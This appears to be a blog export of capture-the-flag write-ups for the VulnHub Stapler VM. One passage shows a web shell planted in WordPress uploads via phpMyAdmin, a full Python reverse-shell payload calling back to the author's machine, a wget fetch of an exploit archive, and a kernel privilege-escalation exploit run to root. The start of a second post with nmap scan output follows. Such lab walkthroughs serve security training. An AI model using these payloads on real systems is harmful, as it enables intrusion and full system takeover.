<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># keep-alive facility, so you usually additionally want to disable</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># keep-alive for those clients, too. Use variable "nokeepalive" for this.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Similarly, one has to force some clients to use HTTP/1.0 to workaround</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># "force-response-1.0" for this.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># BrowserMatch "MSIE [2-6]" \</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span>nokeepalive ssl-unclean-shutdown \</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span>downgrade-1.0 force-response-1.0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ErrorDocument 400 /custom_400.html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></VirtualHost></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></IfModule></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># vim: syntax=apache ts=4 sw=4 sts=4 sr noet</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
The webroot is /var/www/https. With this I can create PHP file in uploads directory using /var/www/https/blogblog/wp-content/uploads/ in phpMyAdmin. Let's first test this with dummy file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-llqWFdHM6z0/V1pFePqj_nI/AAAAAAAABhU/ZlcRHwBM44AMLoXOwKBOUx2uyfpSnbRtQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B23-08-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-llqWFdHM6z0/V1pFePqj_nI/AAAAAAAABhU/ZlcRHwBM44AMLoXOwKBOUx2uyfpSnbRtQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B23-08-37.png" width="640" /></a></div>
And it's accessible.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# curl -k https://192.168.1.3:12380/blogblog/wp-content/uploads/test123.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">test123</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
Next is to create PHP file which will run system commands.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-UU84svzyutc/V1pFeEEwihI/AAAAAAAABhU/jgxqfa9stXcxN1ys_sJYMK08rjKvdfhtQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B23-10-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-UU84svzyutc/V1pFeEEwihI/AAAAAAAABhU/jgxqfa9stXcxN1ys_sJYMK08rjKvdfhtQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B23-10-32.png" width="640" /></a></div>
<br />
Command supplied to 'c' param gets executed.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-content/uploads/shell.php?c=id</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-EgHt8KVW1xY/V1pOTpPq6wI/AAAAAAAABhc/sZgzdoPJs6Yv26LCjuYx_oVP0CbPTn9MwCLcB/s1600/Screenshot%2Bfrom%2B2016-06-10%2B01-20-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-EgHt8KVW1xY/V1pOTpPq6wI/AAAAAAAABhc/sZgzdoPJs6Yv26LCjuYx_oVP0CbPTn9MwCLcB/s1600/Screenshot%2Bfrom%2B2016-06-10%2B01-20-43.png" /></a></div>
Now we need reverse shell from this. After many attempt, I managed to get reverse shell using Python one liner from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">PentestMonkey's reverse cheat sheet</a>.<br />
<br />
The payload looks like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-content/uploads/shell.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.1.7%22,1234%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27</span><br />
<br />
In this payload, 192.168.1.7 is my Kali Linux box listening on port 1234.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# nc -lvp 1234</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">listening on [any] 1234 ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">192.168.1.3: inverse host lookup failed: Unknown host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">connect to [192.168.1.7] from (UNKNOWN) [192.168.1.3] 46444</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/bin/sh: 0: can't access tty; job control turned off</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ uname -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ lsb_release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ lsb_release -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Distributor ID:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Description:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu 16.04 LTS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Release:<span class="Apple-tab-span" style="white-space: pre;"> </span>16.04</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codename:<span class="Apple-tab-span" style="white-space: pre;"> </span>xenial</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ cd /tmp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 7 root root 4096 Jun 10 10:35 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ wget http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-10 10:36:28-- http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.5:80... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 20480 (20K) [application/x-tar]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: 'exploit.tar'</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0K .......... .......... 100% 15.0M=0.001s</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-10 10:36:28 (15.0 MB/s) - 'exploit.tar' saved [20480/20480]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 48</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 7 root root 4096 Jun 10 10:36 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 www-data www-data 20480 Jun 9 18:45 exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ tar -xf exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 52</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:36 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Apr 25 23:25 ebpf_mapfd_doubleput_exploit</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 www-data www-data 20480 Jun 9 18:45 exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ cd ebpf_mapfd_doubleput_exploit</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Apr 25 23:25 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:37 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 www-data www-data 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ./compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c: In function 'make_setuid':</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .insns = (__aligned_u64) insns,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .license = (__aligned_u64)""</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 60</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Jun 10 10:37 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:37 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 www-data www-data 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 12328 Jun 10 10:37 doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 8020 Jun 10 10:37 hello</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 7516 Jun 10 10:37 suidhelper</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ./doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">starting writev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">woohoo, got pointer reuse</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">suid file detected, launching rootshell...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">we have root privs now...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cat /root/flag.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~~~~~~~~~~<(Congratulations)>~~~~~~~~~~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-'''''-.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |'-----'|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |-.....-|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> _,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> __.o` o`"-. | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-O o `"-.o O )_,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">( o O o )--.-"`O o"-.`'-----'`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> '--------' ( o O o) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `----------`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b6b545dc11b7a270f4bad23432190c75162c4a2b</span><br />
<br />
I used the same root exploit from Solution 1 as I'm exausted from working so long on this. I'll try next time to find out other 2 methods of privilege escalation.<br />
<br />
I enjoyed this VM very much and after a long time something technical made me stay awake all night. Thanks to <a href="https://www.vulnhub.com/author/g0tmi1k,21/">g0tmi1k</a> for this wonderful VM.</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com5tag:blogger.com,1999:blog-1544325078740292092.post-78335359928842343052016-06-09T15:20:00.001-07:002016-06-09T15:20:48.138-07:00VulnHub Stapler 1 Solution<div dir="ltr" style="text-align: left;" trbidi="on">
Well, after long time, I'm back to blogging ..!!<br />
<br />
This post is about the solution for the Stapler VM from VulnHub. The VM gets the following IP:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Stapler VM - 192.168.1.3</span><br />
<br />
Nmap scan results shows following output:<br />
<br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#nmap -sSVC -p- 192.168.1.3</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Nmap scan report for 192.168.1.3</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Host is up, received arp-response (0.013s latency).</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Scanned at 2016-06-09 10:55:38 EDT for 170s</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Not shown: 65523 filtered ports</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Reason: 65523 no-responses</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">PORT STATE SERVICE REASON VERSION</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">20/tcp closed ftp-data reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ftp-anon: Anonymous FTP login allowed (FTP code 230)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_Can't get directory listing: Can't parse PASV response: "Permission denied."</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ssh-hostkey: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">53/tcp open domain syn-ack ttl 64 dnsmasq 2.75</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| dns-nsid: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ bind.version: dnsmasq-2.75</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">80/tcp open http syn-ack ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: 404 Not Found</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">123/tcp closed ntp reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">137/tcp closed netbios-ns reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">138/tcp closed netbios-dgm reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: RED)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">666/tcp open doom? syn-ack ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| mysql-info: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Protocol: 53</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Version: .7.12-0ubuntu1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Thread ID: 10</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Capabilities flags: 63487</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Some Capabilities: Support41Auth, ODBCClient, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsTransactions, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, FoundRows</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Status: Autocommit</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Salt: ?C\x1DK\x0B\x02pG\x03T\x01\x06'\x16\x0BW\x01k\x05\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: Tim, we need to-do better next year for Initech</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF-Port80-TCP:V=7.01%I=7%D=6/9%Time=575983E9%P=i586-pc-linux-gnu%r(GetRequ</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:est,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nCo</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ntent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x20533\r\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</title><s</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:tyle>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20#333333;</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x201\.5em;\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20min-heig</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ht:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x20black;</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;\x20}\nc</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:ode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:monospace</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Found</h1><p</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code>\x20was</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%r(HTTPOp</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:tions,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20close\r\n</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:Content-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x20533\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</title></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:<style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20#33333</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:3;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x201\.5em</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">SF:;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20min-he</span><br />
